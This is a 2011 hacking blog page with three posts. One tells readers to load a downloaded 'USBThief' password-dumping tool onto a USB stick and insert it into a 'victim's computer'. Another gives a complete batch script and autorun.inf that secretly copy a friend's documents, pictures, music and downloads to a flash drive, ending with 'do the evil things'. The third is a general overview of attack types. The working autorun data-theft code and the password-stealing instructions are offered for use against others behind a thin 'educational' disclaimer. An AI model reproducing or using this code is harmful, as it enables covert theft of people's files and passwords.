Watch free Internet TV

Watch free Internet TV on Windows Media Center using plugins

How To Access Blocked Websites using easy steps?

This article suggests workarounds to help you unblock access to restricted websites at universities, school and offices.

Best android phones in india 2011

9 Best Android phones in india 2011

Download Moto Racer 3: Gold Edition

Moto Racer 3: Gold Edition with the new features

Scan your facebook wall and account with Norton Internet Security(2011)

Scan your facebook wall and account with Norton Internet Security with download link(2011).

Showing posts with label HACKING. Show all posts
Showing posts with label HACKING. Show all posts

Thursday, May 12, 2011

How To Access Blocked Websites using easy steps?

This summary is not available. Please click here to view the post.

Hack PC password using USB


USB Password Stealer: USB Steals Pc Passwords


Tweaked USB that steals every password including licenses.


Instructions:


1.Download and Decompress the rar file and put all the files located in the folder “USBThief” into a USB. 

(You MUST put all from USB Thief directory in main directory of usb, no folders no anything, just simply copy and paste)


3505730208 10595974e0 USB Password Stealer: USB Steals Pc Passwords



















2.Insert the USB in your victim’s computer.


3.View folder “dump” to see the passwords. It also makes a second dump folder in the batexe folder. 



Tested and Working perfectly!






No Password in the USBThief.rar file.

Sunday, March 27, 2011

How to hack files from other pc






In today’s article I am going to teach you something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media.
I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).
Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.
Here goes the batch code:
@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.
Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.
This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.
Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.
Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.
Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.
This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.
Now let’s create a file that will load it automatically.
[autorun]
Open=Filename.bat
Action=File Copier
The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.
Copy the two files, autorun.inf and Filename.bat in your flash drive.
Then plug in your device to your friends PC and do the evil things.
Where is the flaw?
It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).
Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.
However this is just an educational tutorial.

Learn Hacking Step by Step and to prevent your system from that








It’s one thing to know that your systems generally are under fire from hackers around the world. It’s another to understand specific attacks against your systems that are possible.
Many information-security vulnerabilities aren’t critical by themselves.
However, exploiting several vulnerabilities at the same time can take its toll.

For example, a default Windows OS configuration, a weak SQL Server administrator password, and a server hosted on a wireless network may not be major security concerns separately. But exploiting all three of these vulnerabilities at the same time can be a serious issue.
  • Exploits that involve manipulating people — end users and even yourself —are the greatest vulnerability within any computer or network infrastructure.
  • Humans are trusting by nature, which can lead to social-engineering exploits.
  • Social engineering is defined as the exploitation of the trusting nature of human beings to gain information for malicious purposes.
Hacker attacks against network infrastructures can be easy, because many networks can be reached from anywhere in the world via the Internet. Here are some examples of network-infrastructure attacks:
  • Connecting into a network through a rogue modem attached to a
    computer behind a firewall
  • Exploiting weaknesses in network transport mechanisms, such as TCP/IP and NetBIOS
  • Flooding a network with too many requests, creating a denial of service (DoS) for legitimate requests
  • Installing a network analyzer on a network and capturing every packet that travels across it, revealing confidential information in clear text configuration
  • Piggybacking onto a network through an insecure 802.11b wireless
Operating-system attacks
Hacking operating systems (OSs) is a preferred method of the bad guys. OSs comprise a large portion of hacker attacks simply because every computer has one and so many well-known exploits can be used against them.
Occasionally, some operating systems that are more secure out of the box — such as flavours of BSD UNIX but hackers prefer attacking operating systems like Windows because they are widely used and better known for theirvulnerabilities.
  • Exploiting specific protocol implementation
  • Attacking built-in authentication systems
  • Breaking file-system security
  • Cracking passwords and encryption mechanisms
Application and other specialized attacks
Applications take a lot of hits by hackers. Programs such as e-mail server
software and Web applications often are beaten down:
  • Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP) applications are frequently attacked because most firewalls and other security mechanisms are configured to allow full access to these programs from the Internet.
  • Malicious software (malware) includes viruses, worms, Trojan horses, and spyware. Malware clogs networks and takes down systems.
  • Spam (junk e-mail) is wreaking havoc on system availability and storagespace. And it can carry malware.
  • Ethical hacking helps reveal such attacks against your computer systems.

trytricks

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites